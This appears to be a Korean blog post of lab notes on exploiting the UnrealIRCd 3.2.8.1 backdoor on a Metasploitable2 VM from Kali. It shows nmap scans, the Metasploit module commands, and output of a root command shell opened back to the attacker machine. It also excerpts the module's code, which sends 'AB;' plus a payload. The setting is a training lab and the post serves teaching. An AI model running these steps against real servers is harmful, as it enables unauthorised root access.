(4) 버그를 공격하는 경우(Backdoor 존재하는 취약점)
■ 실습 시스템
- KaliLinux (EX: attacker system)
- Metasploitable V2 Linux (EX: victim system)
■ 공격의 개요
What UnrealRCd?
UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like
operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new
features have been added and modified, including advanced security features and bug fixes, and it has
become a popular server.
UnrealRCd Bug?
On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went
unnoticed for months - triggered by sending the letters "AB" following by a system command to the server
on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell.
This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
위 기간 사이에 존재했던 IRC프로그램 일 때.
exploit/unix/irc/unreal_ircd_3281_backdoor
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive.
This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
■ 취약점 공격 과정(Backdoor 존재하는 취약점)
(KaliLinux)
① UnrealRCD daemon 확인
# nmap -sV 192.168.10.134
********************************************************************************
# nmap -sV 192.168.10.134 2>&1 | tee -a scan.txt모니터에도 출력하고 출력 내용을 파일에도 저장
-a 기존에 파일이 있으면 뒤에 추가# cd /test
# ls -l /var /nodir
# ls -l /var /nodir | tee file.log (error massage는 파일에 저장되지 않는다.)
# ls -l /var /nodir 2>&1 | tee file.log (error massage까지 포함해서 저장하는 방법)
**************************************************************************************************
.....
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
***********************************************************************************
-> Unreal ircd는 port 6667과 6697 포트를 사용한다.
[참고] 자세하게 점검하는 방법은 아래와 같다.
# nmap -p 1-65535 -T4 -A -v 192.168.10.134 2>&1 | tee scan.txt
# egrep -i '(6667|6697|ircd)' scan.txt
Discovered open port 6697/tcp on 192.168.10.134
Discovered open port 6667/tcp on 192.168.10.134
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
***********************************************************************************
② wireshark 실행하여 패킷을 분석
# wireshark & (eth 0)
-> 패킷을 분석한다.
③ msfconsole 실행
# msfconsole -q
|
msf > search unreal_ircd
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 6667 yes The target port
Exploit target:
Id Name -- ---- 0 Automatic Target
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.10.134 RHOST => 192.168.10.134 msf exploit(unreal_ircd_3281_backdoor) > run
Reading from sockets... [*] Reading from socket B [*] B: "AshVia2s0tz2A7vZ\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.10.50:4444 -> 192.168.10.134:54360) at 2016-03-31 22:10:01 +0900
id uid=0(root) gid=0(root) hostname metasploitable ^C Abort session 2? [y/N] y
[*] 192.168.10.134 - Command shell session 2 closed. Reason: User exit msf exploit(unreal_ircd_3281_backdoor) > edit ...... (중략) ..... 57 def exploit 58 connect 59 60 print_status("Connected to #{rhost}:#{rport}...") 61 banner = sock.get_once(-1, 30) 62 banner.to_s.split("\n").each do |line| 63 print_line(" #{line}") 64 end 65 66 print_status("Sending backdoor command...") 67 sock.put("AB;" + payload.encoded + "\n") 68 69 # Wait for the request to be handled 70 1.upto(120) do 71 break if session_created? 72 select(nil, nil, nil, 0.25) 73 handler() 74 end 75 disconnect 76 end 77 end :q! msf exploit(unreal_ircd_3281_backdoor) >
|
**************************************************************************************************************************
④ 분석 보고서를 작성한다.
unreal_ircd_3281_backdoor.rb 파일과 패킷을 분석하여 보고서를 작성한다.
- (ㄱ) 패킷분석
- (ㄴ) 프로그램 분석
- (ㄷ) 패킷/프로그램 분석결과와 "공격개요" 부분에 대한 이해
# cat scan.txt
|
........... Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . |
msf exploit(unreal_ircd_3281_backdoor) > edit
66 print_status("Sending backdoor command...")
67 sock.put("AB;" + payload.encoded + "\n")
와이어샤크 스트링 ab검색
'Learning > └◆Metasploit' 카테고리의 다른 글
| Metasploitable V2 Linux 서버의 취약점(RMI) (0) | 2017.01.10 |
|---|---|
| Metasploitable V2 Linux 서버의 취약점(distccd,samba) (0) | 2017.01.10 |
| Metasploitable V2 Linux 서버의 취약점(Backdoor) (0) | 2017.01.09 |
| Metasploitable V2 Linux 서버의 취약점(NFS) (0) | 2017.01.09 |
